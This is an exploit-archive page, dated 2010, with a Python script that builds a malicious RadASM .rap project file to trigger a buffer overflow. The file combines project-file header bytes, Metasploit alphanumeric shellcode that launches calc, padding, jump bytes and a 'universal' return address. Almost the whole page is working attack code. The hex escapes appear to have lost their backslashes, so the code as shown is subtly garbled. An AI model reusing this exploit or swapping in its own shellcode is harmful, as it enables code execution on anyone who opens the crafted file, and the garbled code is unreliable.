Radasm v2.2.1.6 (.rap) Universal Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Radasm v2.2.1.6 (.rap) Universal Buffer Overflow Exploit
# Published : 2010-02-11
# Author : Dz_attacker
# Previous Title : CastRipper 2.50.70 (.asx) Playlist Stack Overflow Exploit
# Next Title : TweakFS 1.0 (FSX Edition) Stack buffer overflow

#!/usr/bin/python
#[+] Radasm (.rap) Universal buffer overflow Exploit
#[+] Original : http://www.exploit-db.com/exploits/11392
#[+] Exploit : Dz_attacker (dz_attacker@hotmail.fr)

header1=(
"x5bx50x72x6fx6ax65x63x74x5dx0dx0ax41x73x73x65x6dx62x6cx65x72"
"x3dx6dx61x73x6dx0dx0ax47x72x6fx75x70x3dx31x0dx0ax47x72x6fx75"
"x70x45x78x70x61x6ex64x3dx31x0dx0ax5bx46x69x6cx65x73x5dx0dx0a"
"x31x3dx41x56x50x20")


header2=(
"x2ex41x73x6dx0dx0ax32x3dx41x56x50x20x4fx76x65x72x2ex49x6ex63"
"x0dx0ax5bx4dx61x6bx65x46x69x6cx65x73x5dx0dx0ax30x3dx41x56x50"
"x20x4fx76x65x72x2ex72x65x73x0dx0ax5bx4dx61x6bx65x44x65x66x5d"
"x0dx0ax4dx65x6ex75x3dx30x2cx31x2cx31x2cx31x2cx31x2cx31x2cx31"
"x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x0dx0a"
"x31x3dx34x2cx4fx2cx24x42x5cx52x43x2ex45x58x45x20x2fx76x2cx31"
"x0dx0ax32x3dx33x2cx4fx2cx24x42x5cx4dx4cx2ex45x58x45x20x2fx63"
"x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx36x43x6fx67x6fx20"
"x2fx49x22x24x49x22x2cx32x0dx0ax33x3dx35x2cx4fx2cx24x42x5cx4c"
"x49x4ex4bx2ex45x58x45x20x2fx53x55x42x53x59x53x54x45x4dx3ax57"
"x49x4ex44x4fx57x53x20x2fx52x45x4cx45x41x53x45x20x2fx56x45x52"
"x53x49x4fx4ex3ax34x2ex30x20x2fx4cx49x42x50x41x54x48x3ax22x24"
"x4cx22x20x2fx4fx55x54x3ax22x24x35x22x2cx33x0dx0ax34x3dx30x2c"
"x30x2cx2cx35x0dx0ax35x3dx72x73x72x63x2ex6fx62x6ax2cx4fx2cx24"
"x42x5cx43x56x54x52x45x53x2ex45x58x45x2cx72x73x72x63x2ex72x65"
"x73x0dx0ax36x3dx2ax2ex6fx62x6ax2cx4fx2cx24x42x5cx4dx4cx2ex45"
"x58x45x20x2fx63x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx6c"
"x6fx67x6fx20x2fx49x22x24x49x22x2cx2ax2ex61x73x6dx0dx0ax37x3d"
"x30x2cx30x2cx22x24x45x5cx4fx6cx6cx79x44x62x67x22x2cx35x0dx0a"
"x5bx47x72x6fx75x70x5dx0dx0ax47x72x6fx75x70x3dx41x64x64x65x64"
"x20x66x69x6cx65x73x2cx41x73x73x65x6dx62x6cx79x2cx52x65x73x6f"
"x75x72x63x65x73x2cx4dx69x73x63x2cx4dx6fx64x75x6cx65x73x0dx0a"
"x31x3dx31")

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x50x4bx58x45x54x4ex43x4bx48x4ex37"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx34x4ax41x4bx58"
"x4fx55x42x52x41x50x4bx4ex49x54x4bx58x46x33x4bx38"
"x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x52x46x50x45x57x45x4ex4bx38"
"x4fx55x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx44"
"x4bx58x4fx45x4ex51x41x50x4bx4ex4bx58x4ex51x4bx38"
"x41x30x4bx4ex49x58x4ex35x46x42x46x50x43x4cx41x43"
"x42x4cx46x36x4bx48x42x44x42x33x45x58x42x4cx4ax57"
"x4ex30x4bx38x42x54x4ex30x4bx38x42x57x4ex41x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx38x42x38x42x4b"
"x42x30x42x30x42x50x4bx38x4ax36x4ex43x4fx55x41x53"
"x48x4fx42x36x48x45x49x48x4ax4fx43x48x42x4cx4bx37"
"x42x55x4ax56x50x57x4ax4dx44x4ex43x57x4ax46x4ax59"
"x50x4fx4cx48x50x30x47x55x4fx4fx47x4ex43x56x41x56"
"x4ex36x43x56x42x30x5a")

buffer =  header1
buffer += "x41"*2
buffer += shellcode
buffer += "x41"*(1809-len(shellcode))
buffer += "x61"*3
buffer += "xFFxD0"
buffer += "xEBxF9x90x90"
buffer += "x55x25x40x00"    #univ ret
buffer += header2


try:
   rap = open("exploit.rap",'w')
   rap.write(buffer)
   rap.close()
   print "Exploit file created!n"
except:
   print "Error occured!"